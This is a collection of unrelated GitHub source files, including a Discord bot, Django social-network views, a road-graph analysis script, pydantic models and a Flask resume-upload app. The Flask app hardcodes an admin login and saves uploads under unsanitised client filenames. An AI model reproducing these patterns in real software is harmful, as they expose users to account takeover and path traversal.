+{"seq_id":"32556250371","text":"import configparser\nimport traceback\n\nfrom discord.ext import commands\n\n##########################################################################################\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\ndiscord_token = config['discord']['Token']\n\n\n##########################################################################################\n\nclass MusicBot(commands.Bot):\n    initial_extensions = ['cogs.music']\n\n    async def on_ready(self):\n        print(f'Logged in as {self.user}')\n\n    async def on_message(self, message):\n        print(f'Message from {message.author}: {message.content}')\n        await self.process_commands(message)\n\n\nclient = MusicBot(command_prefix=commands.when_mentioned_or('!'))\n\nif __name__ == '__main__':\n    for extension in client.initial_extensions:\n        try:\n            client.load_extension(extension)\n        except Exception as e:\n            traceback.print_exc()\n\nclient.run(discord_token)\n","repo_name":"Lord-Leonard/Jabba_The_Bot","sub_path":"musicBot.py","file_name":"musicBot.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"2318108317","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport pandas as pd\n\n\n\ndef 
create_model(input_dim):\n    model = Sequential()\n    model.add(Dense(64, activation='relu', input_dim=input_dim))\n    model.add(Dense(32, activation='relu'))\n    model.add(Dense(1, activation='sigmoid'))\n    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n    return model\n\n\ndef train_model_from_pandas(csv_filename):\n    df=pd.read_csv(csv_filename)\n    data=df.to_numpy()\n    nb_columns=data.shape[1]-1 # columns\n    model=create_model(nb_columns)\n    X = data[:, :nb_columns]\n    y = data[:, nb_columns]\n    model.fit(X,y,epochs=100,validation_split=0.2)\n\n\n","repo_name":"stephanraaijmakers/deeplearning_utils","sub_path":"code/numpy_pandas_keras.py","file_name":"numpy_pandas_keras.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12414496242","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth import login\nfrom django.contrib.auth import authenticate\n\nfrom .models import Message,Friend,Group,Good\nfrom .forms import GroupCheckForm,GroupSelectForm,\\\n    SearchForm,FriendsForm,CreateGroupForm,PostForm, SignUpForm\n\nfrom django.db.models import Q\nfrom django.contrib.auth.decorators import login_required\n\n# View function for index\n@login_required(login_url='/sns/login/')\ndef index(request):\n    (public_user, public_group) = get_public()\n    \n    if request.method == 'POST':\n        \n        if request.POST['mode'] == '__check_form__':\n            # Create the forms\n            searchform = SearchForm()\n            checkform = GroupCheckForm(request.user, request.POST)\n            # Get the selected group names\n            glist = []\n            # Loop over the group names\n            for group in request.POST.getlist('groups'):\n                glist.append(group)\n            # Get the messages belonging to the checked groups\n            messages = get_your_group_message(request.user, glist, None)\n        \n        if request.POST['mode'] == '__search_form__':\n            searchform = SearchForm(request.POST)\n            checkform = GroupCheckForm(request.user)\n            groups = Group.objects.filter(owner=request.user)\n            glist = [public_group]\n            for group in groups:\n                glist.append(group)\n            messages = get_your_group_message(request.user, glist, \\\n                request.POST['search'])\n        \n    else:\n        searchform = SearchForm()\n        checkform = GroupCheckForm(request.user)\n        groups = Group.objects.filter(owner=request.user)\n        glist = [public_group]\n        for group in groups:\n            glist.append(group)\n        messages = get_your_group_message(request.user, glist, None)\n    \n    params = {\n        'login_user':request.user,\n        'contents':messages,\n        'check_form':checkform,\n        'search_form':searchform,\n    }\n    \n    return render(request, 'sns/index.html', params)\n    \n# Group edit screen\n@login_required(login_url='/sns/login/')\ndef groups(request):\n    friends = Friend.objects.filter(owner=request.user)\n\n    # On POST access \n    if request.method == 'POST':  \n        if request.POST['mode'] == '__groups_form__':\n            sel_group_name = request.POST['groups']\n            sel_group = Group.objects.filter(owner=request.user) \\\n                .filter(title=sel_group_name).first()  \n            check_friends = Friend.objects.filter(owner=request.user) \\\n                .filter(group=sel_group)  \n            userlist = []\n            for friend in check_friends:\n                userlist.append(friend.user.username)  \n            groupsform = GroupSelectForm(request.user, request.POST)\n            friendsform = FriendsForm(request.user, \\\n                friends = friends, vals = userlist)\n        \n        if request.POST['mode'] == '__friends_form__':\n            sel_group_name = request.POST['group']\n            sel_group = Group.objects.filter(owner=request.user) \\\n                .filter(title=sel_group_name).first()\n            
# Handle the case where the selected Group was '-'\n            if sel_group is None:\n                messages.info(request, ' Groupを選択してください。')\n                return redirect(to='/sns/groups')\n            check_friend_names = request.POST.getlist('friends')\n            check_users = User.objects.filter(username__in=check_friend_names)\n            friends = Friend.objects.filter(owner = request.user) \\\n                .filter(user__in=check_users)\n            userlist = []\n            for friend in friends:\n                friend.group = sel_group\n                friend.save()\n                userlist.append(friend.user.username)\n            messages.success(request, ' チェックされたFriendを' + \\\n                sel_group_name + ' に登録しました')  \n            groupsform = GroupSelectForm(request.user, {'groups':sel_group})\n            friendsform = FriendsForm(request.user, \\\n                friends=friends, vals=userlist)\n    \n    # On GET access\n    else:\n        groupsform = GroupSelectForm(request.user)\n        friendsform = FriendsForm(request.user, friends=friends, vals=[])\n        sel_group_name = '-'\n    \n    createform = CreateGroupForm()\n    params = {\n        'login_user':request.user,\n        'groups_form':groupsform,\n        'friends_form':friendsform,\n        'create_form':createform,\n        'group_name':sel_group_name,\n    }\n    return render(request, 'sns/groups.html', params)\n\n# Friend addition handling \n@login_required(login_url='/sns/login/')\ndef add(request):\n    add_name = request.GET['name']\n    add_user = User.objects.get(username=add_name)\n    # Handle an attempt to add yourself\n    if add_user == request.user:\n        messages.info(request, \"自分自身をFriendに追加することはできません。\")\n        return redirect(to='/sns')\n    # Handle the case where the user is already a Friend\n    friend_num = Friend.objects.filter(owner=request.user) \\\n        .filter(user=add_user).count()\n    # If friend_num is 1, the user is already registered\n    if friend_num > 0:\n        messages.info(request, add_user.username + \\\n            ' はすでに追加されています。')\n        return redirect(to='/sns')\n    (public_user, public_group) = get_public()\n    # Register the Friend\n    friend_obj = Friend()\n    friend_obj.owner = request.user\n    friend_obj.user = add_user\n    friend_obj.group = public_group\n    friend_obj.save()\n    messages.success(request, add_user.username + ' を追加しました! 
\\\n        groupページに移動して、追加したFriendをメンバーに設定してください。')\n    return redirect(to='/sns')\n# Group creation handling\n@login_required(login_url='/sns/login/')\ndef creategroup(request):\n    group_name = request.POST['group_name']\n    group_num = Group.objects.filter(owner=request.user) \\\n        .filter(title=group_name).count()\n    if group_num > 0:\n        messages.info(request, group_name + ' はすでに存在します。')\n        return redirect(to='/sns/groups')\n    # Register the Group\n    group_obj = Group()\n    group_obj.owner = request.user\n    group_obj.title = group_name\n    group_obj.save()\n    messages.info(request, '新しいグループを追加しました。')\n    return redirect(to='/sns/groups')\n    \n# Message posting handling\n@login_required(login_url='/sns/login/')\ndef post(request):\n    if request.method == 'POST':\n        content = request.POST['content']\n        group_name = request.POST['groups']\n        group_obj = Group.objects.filter(owner=request.user) \\\n            .filter(title=group_name).first()  \n        if group_obj is None:\n            (pub_user, group_obj) = get_public()\n        msg = Message()\n        msg.owner = request.user\n        msg.group = group_obj\n        msg.content = content\n        msg.save()\n        messages.success(request, '新しいメッセージを投稿しました。')\n        return redirect(to='/sns')\n    # On GET access\n    else:\n        postform = PostForm(request.user)\n    \n    params = {\n        'login_user':request.user,\n        'form':postform,\n    }\n    return render(request, 'sns/post.html', params)\n    \n@login_required(login_url='/sns/login/')\ndef share(request, share_id):\n    share_message = Message.objects.get(id=share_id)\n    \n    if request.method == 'POST':\n        group_name = request.POST['groups']\n        content = request.POST['content']\n        group = Group.objects.filter(owner=request.user) \\\n            .filter(title=group_name).first()\n        if group is None:\n            (pub_user, group) = get_public()\n        message = Message()\n        message.owner = request.user\n        message.group = group\n        message.content = content\n        message.share_id = share_message.id\n        message.save()\n        share_message.share_count += 1\n        share_message.save()\n        messages.success(request, 'メッセージをシェアしました。')\n        return redirect(to='/sns')\n    \n    form = PostForm(request.user)\n    params = {\n        'login_user':request.user,\n        'form':form,\n        'share':share_message,\n    }\n    return render(request, 'sns/share.html', params)\n    \n@login_required(login_url='/sns/login/')\ndef good(request, good_id):\n    \n    good_message = Message.objects.get(id=good_id)\n    is_good = Good.objects.filter(owner=request.user) \\\n        .filter(message=good_message).count()\n    if is_good > 0:\n        messages.success(request, '既にメッセージにはGoodしています。')\n        return redirect(to='/sns')\n    \n    good_message.good_count += 1\n    good_message.save()\n    \n    good = Good()\n    good.owner = request.user\n    good.message = good_message\n    good.save()\n    \n    messages.success(request, 'メッセージにGoodしました。')\n    return redirect(to='/sns')\n\ndef get_your_group_message(owner, glist, find):\n    (public_user, public_group) = get_public()\n\n    # Get the group instances the logged-in user checked\n    check_groups = Group.objects.filter(Q(owner=owner) | Q(owner=public_user)) \\\n        .filter(title__in=glist)\n    \n    check_friends = Friend.objects.filter(group__in=check_groups)\n    check_users = []\n    for friend in check_friends:\n        check_users.append(friend.user)\n    # Groups owned by the users who belong to the selected groups \n    target_users_groups = Group.objects.filter(owner__in=check_users)\n    # The Friend instances obtained here are used to get the groups in which users\n    # belonging to the checked groups have the login user as a member\n    target_friends = Friend.objects.filter(group__in=target_users_groups) \\\n        .filter(user=owner)\n\n    # Groups created by the users we want to display, to which the login user belongs\n    me_belong_groups = []\n    for friend in target_friends:\n        me_belong_groups.append(friend.group)\n    \n    if find is None:\n        messages = 
Message.objects.filter(Q(group__in=me_belong_groups) \\\n            |Q(group__in=check_groups))[:100]\n    else:\n        messages = Message.objects.filter(Q(group__in=me_belong_groups) \\\n            |Q(group__in=check_groups)) \\\n            .filter(content__contains=find)[:100]\n    return messages\n    \ndef get_public():\n    public_user = User.objects.get(username='public')\n    public_group = Group.objects.get(owner=public_user)\n    return (public_user, public_group)\n\n# User signup handling\ndef signup(request):\n    if request.method == 'POST':\n        form = SignUpForm(request.POST)\n        if form.is_valid():\n            user = form.save()\n            login(request, user)\n            return redirect(to='/sns')\n    else:\n        form = SignUpForm()\n    return render(request, 'sns/signup.html', {'form':form})\n\n# Login handling\ndef signin(request):\n    if request.method == 'POST':\n        username = request.POST['username']\n        password = request.POST['password']\n        user = authenticate(username=username, password=password)\n        if user:\n            login(request, user)\n            return redirect(to='/sns')\n        else:\n            messages.info(request, 'ユーザー名/パスワードが正しくありません。')\n\n    return render(request, 'sns/login.html')\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"akihisa2359/sns","sub_path":"sns/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"42670112437","text":"import gamedata\nimport pictures\n\n\ndef get_next_state(state):\n    \"\"\"Returns the next state based on the user's input.\"\"\"\n    \n    succ_states = gamedata.ADVENTURE_TREE[state]\n    \n    if len(succ_states) == 1:\n        return succ_states[0]\n\n    options_text = \"{} {}\\n{} {}\".format(\"1\", gamedata.OPTIONS[succ_states[0]],\n                                         \"2\", gamedata.OPTIONS[succ_states[1]])\n    print(options_text)\n    inp = input(\">> \")\n\n    if inp == \"1\":\n        return succ_states[0]\n    elif inp == \"2\":\n        return succ_states[1]\n\n\ndef main():\n    \"\"\"Starts the game. Contains the game loop.\"\"\"\n\n    # Ask for the player's name.\n    name = input(\"What's your name?\\n>> \")\n    print(\"Welcome {} to the adventure of your life. 
Try to survive and find the \\\n          treasure!\".format(name.upper()))\n\n    current_state = \"Start\"\n\n    # Steps through ADVENTURE_TREE until an end point is reached.\n    while current_state != \"End\":\n        succ_states = gamedata.ADVENTURE_TREE[current_state]\n        description = gamedata.DESCRIPTIONS[current_state]\n        pictures.print_pic(current_state)\n        print(description)\n        current_state = get_next_state(current_state)\n\n\nmain()\n","repo_name":"RubenAngelov/TDDE44","sub_path":"labb_4/del_2/adventure.py","file_name":"adventure.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8910273588","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 21 04:20:58 2019\r\n\r\n@author: marco\r\n\"\"\"\r\n\r\n#imports\r\nimport gzip\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport math\r\nfrom bitarray import bitarray\r\nimport pandas as pd\r\nimport heapq\r\nimport func_1\r\nimport func_2\r\nimport func_3\r\nimport func_4\r\nimport sys\r\nsys.setrecursionlimit(100000)\r\n\r\n#Class for vertex object\r\nclass Vertex(object):\r\n    \r\n    #Constructor of the object Node / instance Node\r\n    def __init__(self, node_id, latitude, longitude): \r\n        self.id = node_id \r\n        self.latitude = latitude \r\n        self.longitude = longitude \r\n        self.connectedTo = {}\r\n        self.previous = None\r\n    \r\n    #storing for each node its neighbours and \r\n    #the relative weight\r\n    def addNeighbor(self, nbr, weight = 0):\r\n        self.connectedTo[nbr] = weight \r\n    \r\n    def __str__(self):\r\n        return str(self.id) + ' connectedTo: ' + str([x.id for x in self.connectedTo]) \r\n    \r\n    #knowing the neighbours of the node \r\n    def getConnections(self):\r\n        return list(self.connectedTo.keys()) \r\n    \r\n    #returning the id of a node\r\n    def getId(self): \r\n        return self.id\r\n    #knowing the distance between \r\n    #a node and the neighbour \r\n    def getWeight(self, nbr): \r\n        return self.connectedTo[nbr]\r\n    \r\n    #returning positions of a node\r\n    def getPositions(self):\r\n        return [self.latitude, self.longitude]\r\n\r\n#Classes representing the 3 Graphs:\r\n#Graph with Physical distances\r\nclass Graph_physical: \r\n    def __init__(self):\r\n        self.vertList = {} \r\n        self.numVertices = 0 \r\n    #Adding new vertex for the graph and mapping it\r\n    #into the dictionary of the graph\r\n    def addVertex(self, key, latitude, longitude):\r\n        self.numVertices = self.numVertices + 1 \r\n        newVertex = Vertex(key, latitude, longitude) \r\n        self.vertList[key] = newVertex\r\n        return newVertex \r\n    \r\n    #Obtaining lat and lon of all the nodes of the graph\r\n    def getPositions(self):\r\n        positions = []\r\n        for n in self.vertList:\r\n            node = self.vertList[n]\r\n            pos = node.getPositions()\r\n            positions.append(pos)\r\n        return positions\r\n    \r\n    #Recalling the instance related to the key 'n' in vertList\r\n    def getVertex(self, n):\r\n        if n in self.vertList:\r\n            return self.vertList[n] \r\n        else:\r\n            return None\r\n\r\n    def __contains__(self, n):\r\n        return n in self.vertList\r\n    \r\n    #Adding an edge between two nodes\r\n    def addEdge(self, f, t, weight = 0):\r\n        if f not in self.vertList:\r\n            nv = self.addVertex(f)\r\n        if t not in self.vertList:\r\n            nv = self.addVertex(t)\r\n        self.vertList[f].addNeighbor(self.vertList[t], weight)\r\n    \r\n    #obtaining all the vertices of the graph\r\n    def getVertices(self):\r\n        return self.vertList.keys() \r\n\r\n    def __iter__(self):\r\n        return iter(self.vertList.values())\r\n    \r\n#2. 
Graph with time Distance\r\nclass Graph_time: \r\n def __init__(self):\r\n self.vertList = {} \r\n self.numVertices = 0 \r\n\r\n def addVertex(self, key, latitude, longitude):\r\n self.numVertices = self.numVertices + 1 \r\n newVertex = Vertex(key, latitude, longitude) \r\n self.vertList[key] = newVertex \r\n return newVertex \r\n\r\n def getVertex(self, n):\r\n if n in self.vertList:\r\n return self.vertList[n] \r\n else:\r\n return None\r\n\r\n def __contains__(self, n):\r\n return n in self.vertList\r\n\r\n def addEdge(self, f, t, weight=0):\r\n if f not in self.vertList:\r\n nv = self.addVertex(f)\r\n if t not in self.vertList:\r\n nv = self.addVertex(t)\r\n self.vertList[f].addNeighbor(self.vertList[t], weight)\r\n\r\n def getVertices(self):\r\n return self.vertList.keys() \r\n\r\n def __iter__(self):\r\n return iter(self.vertList.values())\r\n\r\n#Graph for network distance\r\nclass Graph_network: \r\n def __init__(self):\r\n self.vertList = {} \r\n self.numVertices = 0 \r\n\r\n def addVertex(self, key, latitude, longitude):\r\n self.numVertices = self.numVertices + 1 \r\n newVertex = Vertex(key, latitude, longitude) \r\n self.vertList[key] = newVertex \r\n return newVertex \r\n\r\n def getVertex(self, n):\r\n if n in self.vertList:\r\n return self.vertList[n] \r\n else:\r\n return None\r\n\r\n def __contains__(self, n):\r\n return n in self.vertList\r\n\r\n def addEdge(self, f, t, weight=0):\r\n if f not in self.vertList:\r\n nv = self.addVertex(f)\r\n if t not in self.vertList:\r\n nv = self.addVertex(t)\r\n self.vertList[f].addNeighbor(self.vertList[t], weight)\r\n\r\n def getVertices(self):\r\n return list(self.vertList.keys()) \r\n\r\n def __iter__(self):\r\n return iter(self.vertList.values())\r\n \r\n#cleaning coordinates file\r\ncoord_file = []\r\nf1 = gzip.open('USA-road-d.CAL.co.gz','rb')\r\ncoord_file = f1.readlines()\r\ncoord_file = coord_file[7:]\r\nfor i in range(len(coord_file)):\r\n coord_file[i] = str(coord_file[i])\r\n coord_file[i] = coord_file[i].replace(\"\\\\n\",'')\r\n coord_file[i] = coord_file[i].replace(\"'\",'')\r\n coord_file[i] = coord_file[i].split(' ')\r\n coord_file[i].remove(coord_file[i][0]) \r\n coord_file[i][1]= float((coord_file[i][1])[:4] + '.' + (coord_file[i][1])[4:]) \r\n coord_file[i][2]= float((coord_file[i][2])[:2] + '.' 
+ (coord_file[i][2])[2:])\r\n\r\n#cleaning physical distance file \r\ndist_file = [] \r\nf2 = gzip.open('USA-road-d.CAL.gr.gz','rb')\r\ndist_file = f2.readlines()\r\ndist_file = dist_file[7:]\r\nfor i in range(len(dist_file)):\r\n dist_file[i] = str(dist_file[i])\r\n dist_file[i] = dist_file[i].replace(\"\\\\n\",'')\r\n dist_file[i] = dist_file[i].replace(\"'\",'')\r\n dist_file[i] = dist_file[i].split(' ')\r\nfor i in range(len(dist_file)):\r\n dist_file[i].remove(dist_file[i][0])\r\n \r\n \r\n#cleaning time distances file \r\ntime_file = [] \r\nf3 = gzip.open('USA-road-t.CAL.gr.gz','rb')\r\ntime_file = f3.readlines()\r\ntime_file = time_file[7:]\r\nfor i in range(len(time_file)):\r\n time_file[i] = str(time_file[i])\r\n time_file[i] = time_file[i].replace(\"\\\\n\",'')\r\n time_file[i] = time_file[i].replace(\"'\",'')\r\n time_file[i] = time_file[i].split(' ')\r\nfor i in range(len(time_file)):\r\n time_file[i].remove(time_file[i][0])\r\n\r\n\r\n#Creating the Graph with physical distances \r\nG_physical = Graph_physical()\r\nfor city in coord_file:\r\n G_physical.addVertex(city[0], city[1], city[2])\r\nfor link in dist_file:\r\n G_physical.addEdge(link[0], link[1], weight = link[2])\r\n\r\n\r\n#Creating the Graph with time distances\r\nG_time = Graph_time()\r\nfor city in coord_file:\r\n G_time.addVertex(city[0], city[1], city[2])\r\nfor link in time_file:\r\n G_time.addEdge(link[0], link[1], weight = link[2])\r\n\r\n#Creating the graph with network distances\r\nG_network = Graph_network()\r\nfor city in coord_file:\r\n G_network.addVertex(city[0], city[1], city[2])\r\nfor link in dist_file:\r\n G_network.addEdge(link[0], link[1], weight = 1)\r\n \r\n#taking all the longitudes and latitudes \r\nlat = []\r\nlon = []\r\nfor city in coord_file:\r\n lat.append(city[1])\r\n lon.append(city[2])\r\n\r\n#The four functions belows allow the user to choose\r\n#between physical, network and time distance \r\ndef choice_distance_1(): \r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. \\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_1.Function_1(G_physical, 'violet', lat, lon)\r\n elif dist_choice == 2:\r\n func_1.Function_1(G_time, 'white', lat, lon)\r\n elif dist_choice == 3:\r\n func_1.Function_1(G_network, 'azure', lat, lon)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_1()\r\n \r\ndef choice_distance_2(): \r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. \\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_2.Function_2(G_physical)\r\n elif dist_choice == 2:\r\n func_2.Function_2(G_time)\r\n elif dist_choice == 3:\r\n func_2.Function_2(G_network)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_2()\r\n \r\ndef choice_distance_3(): \r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. \\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_3.Function_3(G_physical, lat, lon)\r\n elif dist_choice == 2:\r\n func_3.Function_3(G_time, lat, lon)\r\n elif dist_choice == 3:\r\n func_3.Function_3(G_network, lat, lon)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_3()\r\n\r\ndef choice_distance_4():\r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. 
\\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_4.Function_4(G_physical, lat, lon)\r\n elif dist_choice == 2:\r\n func_4.Function_4(G_time, lat, lon)\r\n elif dist_choice == 3:\r\n func_4.Function_4(G_network, lat, lon)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_4()\r\n\r\n#This function allows the user to choose which function he wants to use\r\ndef Function_to_use():\r\n f_choice = int(input('Choose between: \\n1.Find the Neighbours!; \\n2.Find the smartest Network!; \\n3.Shortest Ordered Route; \\n4.Shortest Route. \\nYour choice: ', ))\r\n if f_choice == 1:\r\n return choice_distance_1()\r\n elif f_choice == 2:\r\n return choice_distance_2()\r\n elif f_choice == 3:\r\n return choice_distance_3()\r\n elif f_choice == 4:\r\n return choice_distance_4()\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3 - 4')\r\n return Function_to_use()","repo_name":"Marco-Colombi/Homework-5-ADM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37742583817","text":"from typing import Optional\nfrom pydantic import BaseModel, Field\n\n\nclass AppsModel(BaseModel):\n brand_id: str = Field(...)\n user_id: str = Field(...)\n bundle_id: str = Field(...)\n platform: str = Field(...)\n slack_integration: bool = False\n clickup_integration: bool = False\n jira_integration: bool = False\n\n class Config:\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"brand_id\": \"60a6c72d470fa98f64464cbc\",\n \"user_id\": \"60a57e1d1201f43c9c51c044\",\n \"bundle_id\": \"aaa.bbb.ccc.beta\",\n \"platform\": \"Android\",\n \"slack_integration\": False,\n \"clickup_integration\": False,\n \"jira_integration\": False,\n }\n }\n\n\nclass UpdateAppsModel(BaseModel):\n brand_id: Optional[str]\n user_id: Optional[str]\n bundle_id: Optional[str]\n platform: Optional[str]\n slack_integration: Optional[bool]\n clickup_integration: Optional[bool]\n jira_integration: Optional[bool]\n\n class Config:\n schema_extra = {\n \"example\": {\n \"brand_id\": \"60a6c72d470fa98f64464cbc\",\n \"user_id\": \"60a57e1d1201f43c9c51c044\",\n \"bundle_id\": \"aaa.bbb.ccc.beta\",\n \"platform\": \"Android\",\n \"slack_integration\": False,\n \"clickup_integration\": False,\n \"jira_integration\": False,\n }\n }\n","repo_name":"ertyurk/bugme-backend","sub_path":"app/models/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73393166826","text":"import os\nfrom flask import (Flask,session,flash, redirect, render_template, request, url_for, send_from_directory)\nimport csv\n\n\napp = Flask(__name__,template_folder=\"templates\")\napp.config.from_object(__name__) \n\napp.config['UPLOAD_FOLDER'] = 'Upload-Resume'\napp.config['UPLOAD_JD_FOLDER'] = 'Upload-JD'\n\n\ndef getfilepath(loc):\n temp = str(loc).split('\\\\')\n return temp[-1]\n\n\n# Route for handling the login page logic\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n print(request.form['username'])\n print(request.form['password'])\n if request.form['username'] != 'admin@gmail.com' or request.form['password'] != 'admin':\n error = 'Invalid Credentials. 
Please try again.'\n else:\n return redirect(url_for('index'))\n return render_template('Sign_in.html', error=error)\n\n\n@app.route(\"/index\")\ndef index():\n return render_template('index.html')\n\n@app.route(\"/candidate\")\ndef main():\n return render_template('candidate_resume.html')\n \n\n@app.route(\"/jobs\", methods=['GET', 'POST'])\ndef job():\n error = None\n x = os.listdir(app.config['UPLOAD_JD_FOLDER'])\n return render_template('jobs.html',name=x)\n\n\n@app.route(\"/checker\")\ndef ch():\n return render_template('resume_checker.html')\n\n@app.route(\"/res\")\ndef res1():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Akhil.profile.pdf')\n\n@app.route(\"/res2\")\ndef res2():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'AnilAgarwal.pdf')\n\n@app.route(\"/res3\")\ndef res3():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Dhruvi.pdf')\n\n@app.route(\"/res4\")\ndef res4():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Jennifer M. Conte.pdf')\n\n@app.route(\"/res5\")\ndef res5():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Akhil.profile.pdf')\n\n@app.route(\"/res6\")\ndef res6():\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/resume_files'\n return send_from_directory(filepath, 'Rajesh_k.pdf')\n\n@app.route(\"/JD\")\ndef JD():\n x = os.listdir(app.config['UPLOAD_FOLDER'])\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + '/JD_files'\n return render_template('jobs.html', name = x)\n #return send_from_directory(name = x)\n\n@app.route('/Upload-Resume/')\ndef custom_static(filename):\n print(filename)\n return send_from_directory('./Upload-JD', filename)\n\n# Upload files\n@app.route(\"/upload\", methods=['POST'])\ndef upload_file():\n Error = None\n if request.method=='POST':\n #upload Job Description\n if 'Jdfiles'in request.files:\n filelist = [ f for f in os.listdir(app.config['UPLOAD_JD_FOLDER']) ] \n x = os.listdir(app.config['UPLOAD_JD_FOLDER'])\n for f in request.files.getlist('Jdfiles'):\n if f.filename in x:\n Error = \"All Ready \"+f.filename +\" Existed\"\n else:\n f.save(os.path.join(app.config['UPLOAD_JD_FOLDER'], f.filename)) \n x = os.listdir(app.config['UPLOAD_JD_FOLDER'])\n return render_template('jobs.html', name = x)\n \n #upload Resume\n if 'Resumefiles' in request.files:\n filelist = [ f for f in os.listdir(app.config['UPLOAD_FOLDER']) ] \n x = os.listdir(app.config['UPLOAD_FOLDER'])\n for f in request.files.getlist('Resumefiles'):\n if f.filename in x:\n Error = \"All Ready \"+f.filename +\" Existed\"\n else:\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], f.filename)) \n x = os.listdir(app.config['UPLOAD_FOLDER'])\n return render_template('candidate_resume.html',name = x)\n\"\"\" \n# Fetch data\ndef source_data():\n x = os.listdir(app.config['UPLOAD_FOLDER'])\n fields = ['Candidate', 'Name', 'Email', 'Phone no','Skills','Qualification','Experience','Company Name'] \n \n # name of csv file \n filename = \"records.csv\"\n workingdir = os.path.abspath(os.getcwd())\n filepath = workingdir + 'Results'\n # writing to csv file \n with open((os.path.join(filepath, filename)), 'w') as csvfile: \n # creating a csv writer object \n 
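# note: this whole helper sits inside the triple-quoted block opened above, so it is effectively disabled as written\n        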
csvwriter = csv.writer(csvfile)\n\n # writing the fields \n csvwriter.writerow(fields)\n\n # writing the data rows \n #csvwriter.writerows(rows)\n df = pandas.read_csv(os.path.join(filepath, filename), index_col=False, header=0)\n serie = df.iloc[0, :]\n print(serie)\n\"\"\" \nif __name__ == '__main__':\n app.run(debug=True, use_reloader=False)","repo_name":"geet121/Resume-parser-subtas","sub_path":"Resume_Parser.py","file_name":"Resume_Parser.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36829159508","text":"import http.client\nimport json\n\n# http.client expects a bare host name; the request path (including the /api prefix) is passed to conn.request() below\nconn = http.client.HTTPSConnection(\"backend-qa-api.facturafacil.com.pa\")\npayload = json.dumps({\n \"header\": {\n \"id\": 1,\n \"environment\": \"2\"\n },\n \"document\": {\n \"fd_number\": \"12\",\n \"receptor\": {\n \"type\": \"02\",\n \"name\": \"Nombre Cliente\",\n \"ruc_type\": \"1\",\n \"address\": \"Dirección Cliente\",\n \"email\": \"cliente@correo.com\",\n \"ruc\": \"123123123\"\n },\n \"items\": [\n {\n \"line\": 1,\n \"price\": 0.5,\n \"mu\": \"und\",\n \"quantity\": 1,\n \"description\": \"Producto de prueba\",\n \"taxes\": [\n {\n \"type\": \"01\",\n \"amount\": 0.035,\n \"code\": \"01\"\n }\n ],\n \"discount\": 0,\n \"internal_code\": \"123123\"\n }\n ],\n \"payments\": [\n {\n \"type\": \"99\",\n \"amount\": \"0.54\",\n \"description\": \"Medio de pago de prueba\"\n }\n ],\n \"type\": \"01\",\n \"info\": \"\"\n }\n})\nheaders = {\n 'X-FF-Company': '[UUID DE FF]',\n 'X-FF-API-Key': '[KEY DE FF]',\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n}\nconn.request(\"POST\", \"/api/pac/reception_fe/detailed/\", payload, headers)\nres = conn.getresponse()\ndata = res.read()\nprint(data.decode(\"utf-8\"))\n","repo_name":"Factura-Facil/ejemplos","sub_path":"python http client.py","file_name":"python http client.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 